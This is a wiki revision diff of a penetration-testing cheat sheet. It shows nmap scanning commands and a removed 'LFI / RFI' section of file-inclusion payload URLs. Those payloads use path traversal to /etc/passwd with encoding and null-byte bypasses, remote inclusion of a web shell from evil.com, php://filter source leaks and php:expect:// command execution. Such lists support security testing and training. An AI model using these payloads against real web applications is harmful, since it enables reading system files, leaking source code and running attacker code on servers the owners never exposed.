Difference between revisions of "Cheat Sheet"

(LFI / RFI)
(Tag: Replaced)
Line 3: Line 3:
 
nmap -sP 192.168.56.0/24
 
nmap -sP 192.168.56.0/24
 
nmap -O -sT -sV -p- -T5 192.168.56.101
 
nmap -O -sT -sV -p- -T5 192.168.56.101
</syntaxhighlight>
 
 
===== LFI / RFI =====
 
<syntaxhighlight>
 
http://example.com/index.php?page=../../../etc/passwd
 
http://example.com/index.php?page=../../../etc/passwd%00
 
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
 
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
 
http://example.com/index.php?page=....//....//etc/passwd
 
http://example.com/index.php?page=..///////..////..//////etc/passwd
 
http://example.com/index.php?page=http://evil.com/shell.txt
 
http://example.com/index.php?page=http://evil.com/shell.txt%00
 
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 
http://example.com/index.php?page=php:expect://id
 
http://example.com/index.php?page=php:expect://ls
 
http://example.com/index.php?page=path/to/uploaded/file.png
 
 
</syntaxhighlight>
 
</syntaxhighlight>

Revision as of 13:23, 26 April 2018

nmap
nmap -sP 192.168.56.0/24
nmap -O -sT -sV -p- -T5 192.168.56.101